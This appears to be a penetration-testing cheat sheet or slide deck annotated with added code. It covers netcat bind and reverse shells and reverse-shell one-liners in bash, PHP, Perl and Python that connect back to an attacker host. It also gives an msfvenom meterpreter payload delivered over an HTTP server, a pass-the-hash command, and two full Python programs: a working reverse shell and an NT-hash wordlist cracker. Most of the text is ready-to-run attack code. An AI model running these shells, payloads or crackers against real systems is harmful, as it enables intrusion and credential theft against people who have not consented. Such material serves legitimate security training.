Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command for Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list
Connection testing with netcat
#Bind (victim listens, tester connects in)
Tester: 10.10.10.20    Victim: 10.10.10.10
[Unix OS, victim]
root# nc -vnlp 4444 -e /bin/bash
[Tester]
kali# nc 10.10.10.10 4444
Connection testing with netcat
#Reverse (tester listens, victim connects back)
Tester: 10.10.10.20    Victim: 10.10.10.10
kali# nc -vnlp 4444
[Windows OS]
C:\> nc.exe 10.10.10.20 4444 -e cmd.exe
[Unix OS]
root# nc 10.10.10.20 4444 -e /bin/bash
Note: -e only exists in netcat builds that support program execution (nc.exe, netcat-traditional, ncat --exec). The OpenBSD nc shipped on many distributions has no -e; use one of the other reverse-shell one-liners there.
Connection testing with netcat
#Upload File (tester -> victim)
Tester: 10.10.10.20    Victim: 10.10.10.10
[Unix OS, victim receives]
root# nc -vnlp 4444 > file.txt
[Tester sends]
kali# nc 10.10.10.10 4444 < file.txt
Netcat gives no "transfer complete" signal: compare sha256sum (or md5sum) of the file on both sides. If the sender does not exit on EOF, add -q 0 (netcat-traditional) or -N (OpenBSD nc) on the sending side.
Connection testing with netcat
#Download File (victim -> tester)
Tester: 10.10.10.20    Victim: 10.10.10.10
[Victim serves the file first]
[Windows OS]
C:\> nc.exe -vnlp 4444 < file.txt
[Unix OS]
root# nc -vnlp 4444 < file.txt
[Tester then connects and receives]
kali# nc 10.10.10.10 4444 > file.txt
Reverse shell
#Reverse
Tester: 10.10.10.20    Victim: 192.168.0.10
kali# nc -vnlp 443
#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh
#Bash-reverse shell (needs bash, not sh: /dev/tcp is a bash built-in)
bash -i >& /dev/tcp/10.10.10.20/443 0>&1
#PHP-reverse shell (assumes the socket is fd 3, i.e. the first fd opened after stdin/stdout/stderr; if it fails, try 4, 5 or 6)
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'
#Perl-reverse shell
perl -e 'use Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
#Python-reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.20",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
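All of the one-liners above do the same three things: open a TCP connection back to the tester, copy the socket onto file descriptors 0, 1 and 2, and exec a shell. The following is an added example, not code from the slides, that spells that out and runs both halves against each other on 127.0.0.1 so it can be exercised offline: a plain TCP listener stands in for the tester's nc -vnlp 443, and the victim half hands the socket to /bin/sh. The host, port and the commands sent are assumptions for the demo; a POSIX /bin/sh is required.

```python
"""Added example: the mechanics behind the Python reverse-shell one-liner,
run end to end on localhost.  Not part of the original slides."""
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int, interactive: bool = False) -> int:
    """Connect back to host:port and attach /bin/sh to the socket.

    Passing the socket's file descriptor as stdin/stdout/stderr makes
    subprocess dup2() it onto fds 0, 1 and 2 in the child, exactly what the
    three os.dup2() calls in the one-liner do: the shell never knows it is
    talking to a network socket.  The slide uses 'sh -i' so the tester gets
    a prompt; the demo leaves it non-interactive so the output is clean.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    argv = ["/bin/sh", "-i"] if interactive else ["/bin/sh"]
    fd = s.fileno()
    rc = subprocess.call(argv, stdin=fd, stdout=fd, stderr=fd)
    s.close()
    return rc


def _tester_side(listener: socket.socket, commands: str, out: list) -> None:
    """Stand-in for 'nc -vnlp PORT': accept one client, send commands, collect output."""
    conn, _peer = listener.accept()
    with conn:
        conn.sendall(commands.encode())
        conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin, so it exits when done
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    out.append(b"".join(chunks).decode(errors="replace"))


def demo(commands: str = "echo shell-says-$((6*7))\necho second-line\n") -> str:
    """Run tester and victim halves against each other on localhost.

    Returns what the tester saw coming back over the socket.  The commands
    are constructed for this demo (assumption: any POSIX sh will run them).
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the kernel pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    out: list = []
    t = threading.Thread(target=_tester_side, args=(listener, commands, out))
    t.start()
    reverse_shell("127.0.0.1", port)  # the "victim" connecting back
    t.join()
    listener.close()
    return out[0]


if __name__ == "__main__":
    print(demo(), end="")
```

Because stderr is also redirected, error messages from the remote shell come back over the same socket; that is why an interactive shell prompt (from sh -i) shows up in the tester's terminal even though it is written to stderr.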
Information gathering
#tcpdump
kali# tcpdump -l -i eth0 -vv | grep -v 192.168.31.132
(-l line-buffers stdout so grep sees each packet as it arrives instead of after the buffer fills)
kali# tcpdump -i eth0 -w outfile.pcap
#tshark
kali# tshark -i eth0
Capture packets with tshark
kali# tshark -i eth0 -w capture-output.pcap
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o reverseshell.exe
kali# python -m SimpleHTTPServer 8000
(SimpleHTTPServer is Python 2; on current Kali use python3 -m http.server 8000.)
Copy the file to the victim (fetch it from http://192.168.117.137:8000/reverseshell.exe) and run it. A Metasploit multi/handler configured with the same payload, LHOST and LPORT must already be listening, otherwise the connect-back is lost.
Post Exploitation
#Crack with John the Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
(--format=NT expects the NT hash, either bare or as a pwdump line user:rid:LM:NT:::; NT hashes are unsalted, so a wordlist attack is just hash-and-compare.)
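To show what --format=NT is actually doing, here is an added example, not from the slides or from John itself: an NT hash is MD4 over the UTF-16LE encoding of the password with no salt, so cracking is hashing each wordlist candidate and comparing. MD4 is implemented in pure Python because OpenSSL 3 builds of hashlib often refuse it as a legacy algorithm. The pwdump line and wordlist are constructed for the example (the NT hash used is that of "password"); the helper names are the example's own.

```python
"""Added example: a minimal NT-hash wordlist cracker.  Not part of the slides."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (hashlib may lack md4 on OpenSSL 3)."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)  # length in bits, little-endian

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        # Rotating the register tuple after every step reproduces the
        # ABCD / DABC / CDAB / BCDA pattern of the RFC's step list.
        for i in range(16):  # round 1
            s = (3, 7, 11, 19)[i % 4]
            A, B, C, D = D, _rotl((A + f(B, C, D) + x[i]) & MASK, s), B, C
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            s = (3, 5, 9, 13)[i % 4]
            A, B, C, D = D, _rotl((A + g(B, C, D) + x[k] + 0x5A827999) & MASK, s), B, C
        for i in range(16):  # round 3
            s = (3, 9, 11, 15)[i % 4]
            A, B, C, D = D, _rotl((A + h(B, C, D) + x[r3_order[i]] + 0x6ED9EBA1) & MASK, s), B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex, no salt."""
    return md4(password.encode("utf-16-le")).hex()


# LM hash of the empty string: what a pwdump line shows when LM storage is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def parse_pwdump(line: str):
    """Split a pwdump-style line 'user:rid:LM:NT:::' into (user, lm, nt)."""
    user, _rid, lm, nt = line.strip().split(":")[:4]
    return user, lm.lower(), nt.lower()


def crack_nt(nt: str, wordlist) -> "str | None":
    """Return the first wordlist entry whose NT hash matches, else None."""
    nt = nt.lower()
    for word in wordlist:
        if nt_hash(word) == nt:
            return word
    return None


# Constructed sample input (assumption, not from the slides): NT hash of "password".
SAMPLE_HASH_LINE = "administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
SAMPLE_WORDLIST = ["123456", "letmein", "Password1", "password", "qwerty"]


def demo():
    user, lm, nt = parse_pwdump(SAMPLE_HASH_LINE)
    lm_note = "LM disabled" if lm == EMPTY_LM else "LM hash present (crack it first, it is far weaker)"
    return user, lm_note, crack_nt(nt, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print(demo())
```

Real runs are bounded by hashing speed, not by logic: John and hashcat do the same comparison with vectorised MD4, which is why an unsalted NT hash falls to rockyou.txt in seconds when the password is in the list.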
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash
pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42" //192.168.200.132 cmd.exe
(The credential is given as LM:NT. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, meaning LM storage is disabled; the NT half is what authenticates.)
Post Exploitation
#Token Impersonation
Hack The Box | Previse
Connect VPN
Player OS : Kali Linux
Target OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the admin area and source code
Reverse shell with netcat to my own machine
Brute-forcing the password
Privilege Escalation
SUID
Git / GitHub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/